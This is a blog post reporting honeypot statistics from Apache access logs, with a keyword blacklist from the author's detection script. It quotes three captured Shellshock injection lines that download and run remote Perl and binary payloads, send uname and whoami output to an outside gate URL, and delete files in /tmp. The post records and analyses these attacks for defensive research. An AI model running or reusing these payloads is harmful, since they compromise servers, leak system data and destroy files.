Mid May Report

Mid-May Honeypot report.
Today I will realease some statistics of my Honeypot. The data is fetched using my apache analyzer script in newest version. Source data are all access log starting with 18 April until today.

~/SendMeSpamIDS.py/mypyfwa$ python mypyfwa.py -s /home/jstephan/MidMay.log -l -i 0 -f MidMay
extended Blacklist: Wget|Python|sqlmap|curl|apach0day|pma|php|connect|wordpress|wp|zmeu|masscan|morfeus
extended Whitelist: 127.0.0.1|::1
Logged 25 Lines of bad headers
Logged 351 Lines of possible injections
Logged 16 Lines of strange headers

 If you want to do some research on your own: Here is the source document (GoogleDrive)

• As always, md5 hashes to the files I have seen in Shell injections can be found within my ClamAV repository on github 
• All urls and IPs have been reported to Virustotal and IBM XForce Exchange

 Overall statistics

CountryCode overview

Scanner

The favorite tool to scan a Apache servers still seems to be masscan

masscan/1.0 (https://github.com/robertdavidgraham/masscan)

Shellinjection

This are still my favorite, as you get so much out of it, you see a nice URL and you get some malware you can analyze, pure fun :-)

 Some examples:

Perl based:

194.176.119.86 - - [02/May/2015:21:14:22 +0200] "GET / HTTP/1.1" 404 412 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://psychoid.us/non -O /tmp/b.pl;curl -O /tmp/b.pl http://psychoid.us/non;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
 

other:

46.151.212.26 - - [12/May/2015:01:31:28 +0200] "GET /cgi-bin/ HTTP/1.0" 408 519 "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`" "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`"

 ChinaZ:

121.207.230.74 - - [20/Apr/2015:22:59:37 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/java -O /tmp/China.Z-taar >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-taar >> /tmp/Run.sh;echo /tmp/China.Z-taar >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/java -O /tmp/China.Z-taar >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-taar >> /tmp/Run.sh;echo /tmp/China.Z-taar >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
 

Length of request

I have one check which check the request length. I used a hardcoded size to detect this. Normally nothing good comes from a log request.

• PHP encoded - means hereby that the url was encoded, please see an older blogpost which explains this sort of attack here
• Wordpress direct - means that this was a direct request against a admin page or such
• connect - means the connect statements I described in an older blogpost here